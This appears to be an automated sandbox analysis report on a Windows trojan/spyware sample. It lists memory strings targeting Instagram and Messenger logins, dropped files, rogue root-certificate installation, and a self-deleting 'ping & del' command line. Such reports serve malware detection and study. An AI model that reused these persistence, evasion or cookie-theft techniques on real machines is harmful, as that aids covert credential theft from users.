Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp, ecv71A3.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecv71A3.tmp.1.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.com
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.com/sec-fetch-dest:
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.instagram.comreferer:
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.com
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.com/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/wd=488x1043;
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.com/origin:
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	String found in binary or memory: https://www.messenger.comaccept-language:
Source: aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp	String found in binary or memory: https://www.namecheap.com/assets/img/nc
Source: aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.namecheap.com/assets/img/nc-icon/favicon.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040AE4D OpenClipboard,

1_2_0040AE4D

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: 0_2_0042D3A8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

0_2_0042D3A8

Source: ThunderFW.exe, 00000002.00000002.231958578.0000000000B5A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: 0_2_0043B0F0 GetKeyState,GetKeyState,GetKeyState,

0_2_0043B0F0

System Summary:

PE file has a writeable .text section

Show sources

Source: aOn5CfTiwS.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_0040C516 NtQuerySystemInformation,		1_2_0040C516
Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,		1_2_0040C6FB

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_004A0004	0_2_004A0004
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_004443D4	0_2_004443D4
Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_00404BE4	1_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095A0C3	2_2_0095A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_00956A1E	2_2_00956A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095963B	2_2_0095963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095A7BB	2_2_0095A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_0095B51C	2_2_0095B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_00959B7F	2_2_00959B7F

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: String function: 004AA524 appears 37 times

Source: aOn5CfTiwS.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 1612058829275.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612058829275.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: aOn5CfTiwS.exe	Binary or memory string: OriginalFilename vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameFsFilter.sys vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename" vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp	Binary or memory string: @shell32.dllSHGetSpecialFolderPathWSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Foldersshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X<>"°&<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileName vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameEdgeCookiesView.exe@ vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe	Binary or memory string: OriginalFilename" vs aOn5CfTiwS.exe

Source: aOn5CfTiwS.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 00000000.00000002.265213011.0000000010249000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.2880000.2.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.2880000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.10000000.3.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: classification engine

Classification label: mal80.troj.spyw.evad.winEXE@10/16@7/2

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Code function: CreateServiceA,GetLastError,

0_2_004072E8

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

1_2_0040CE93

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Code function: 2_2_00951058 CoCreateInstance,

2_2_00951058

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,

1_2_0040D9FC

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_01
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_install_r3

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

File created: C:\Users\user\AppData\Local\Temp\xldl.dat

Jump to behavior

Source: aOn5CfTiwS.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: aOn5CfTiwS.exe	Virustotal: Detection: 43%
Source: aOn5CfTiwS.exe	Metadefender: Detection: 24%
Source: aOn5CfTiwS.exe	ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

File read: C:\Users\user\Desktop\aOn5CfTiwS.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\aOn5CfTiwS.exe 'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\1612058829275.exe 'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Process created: C:\Users\user\AppData\Roaming\1612058829275.exe 'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt'	Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'	Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E2B3C97F-6AE1-41AC-817A-F6F92166D7DD}\InprocServer32

Jump to behavior

Source: aOn5CfTiwS.exe

Static file information: File size 5007872 > 1048576

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Jump to behavior

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.0.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe, 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp, 1612058829275.exe.0.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.0.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.0.dr
Source:	Binary string: atl71.pdb source: atl71.dll.0.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.0.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.0.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.0.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.0.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.0.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.0.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000002.00000000.231496774.000000000095C000.00000002.00020000.sdmp, ThunderFW.exe.0.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.0.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.0.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Unpacked PE file: 0.2.aOn5CfTiwS.exe.2880000.2.unpack

Source: C:\Users\user\AppData\Roaming\1612058829275.exe

Code function: 1_2_0040D071 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0040D071

Source: aOn5CfTiwS.exe

Static PE information: real checksum: 0xeea28 should be: 0x4c8d48

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0040D0E4 push 0040D110h; ret	0_2_0040D108
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_004421C4 push 0044221Eh; ret	0_2_00442216
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0044526C push 00445298h; ret	0_2_00445290
Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_0040E2F1 push ecx; ret	1_2_0040E301
Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_0040E340 push eax; ret	1_2_0040E354
Source: C:\Users\user\AppData\Roaming\1612058829275.exe	Code function: 1_2_0040E340 push eax; ret	1_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 2_2_00953FB5 push ecx; ret	2_2_00953FC8

Persistence and Installation Behavior:

Installs new ROOT certificates

Show sources

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob

Jump to behavior

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Roaming\1612058829275.exe	Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	File created: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0043A078 IsIconic,BeginPaint,DrawIcon,EndPaint,	0_2_0043A078
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_00441118 SendMessageA,SetClassLongA,IsIconic,InvalidateRect,	0_2_00441118
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe	Code function: 0_2_0043A1C4 IsIconic,	0_2_0043A1C4
